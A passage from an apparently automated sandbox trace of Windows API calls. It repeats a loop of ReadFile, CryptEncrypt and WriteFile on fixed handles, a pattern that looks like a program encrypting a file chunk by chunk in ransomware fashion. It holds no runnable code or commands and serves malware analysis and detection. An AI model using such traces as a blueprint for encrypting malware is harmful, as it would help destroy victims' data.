(in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.477] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.477] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.477] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.477] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.477] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.477] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.477] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.477] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.477] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.477] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.477] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.478] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.478] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.478] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.478] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.478] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.478] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.478] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.478] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.478] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.478] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.478] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.478] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.478] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.479] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.479] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.479] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.479] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.479] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.479] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.479] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.479] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.479] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.479] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.479] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.479] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.479] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.480] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.480] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.480] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.480] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.480] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.480] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.480] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.480] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.480] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.480] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.480] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.480] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.480] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.481] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.481] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.481] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.481] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.481] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.481] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.481] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.481] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.481] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.481] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.481] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.481] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.481] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.482] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.482] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.482] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.482] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.482] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.482] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.482] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.482] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.482] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.482] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.482] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.482] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.482] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.482] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.483] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.483] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.483] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.483] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.483] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.483] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.483] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.483] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.483] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.483] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.483] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.483] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.484] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.484] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.484] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.484] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.484] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.484] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.484] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.484] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.484] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.484] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.484] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.484] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.484] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, 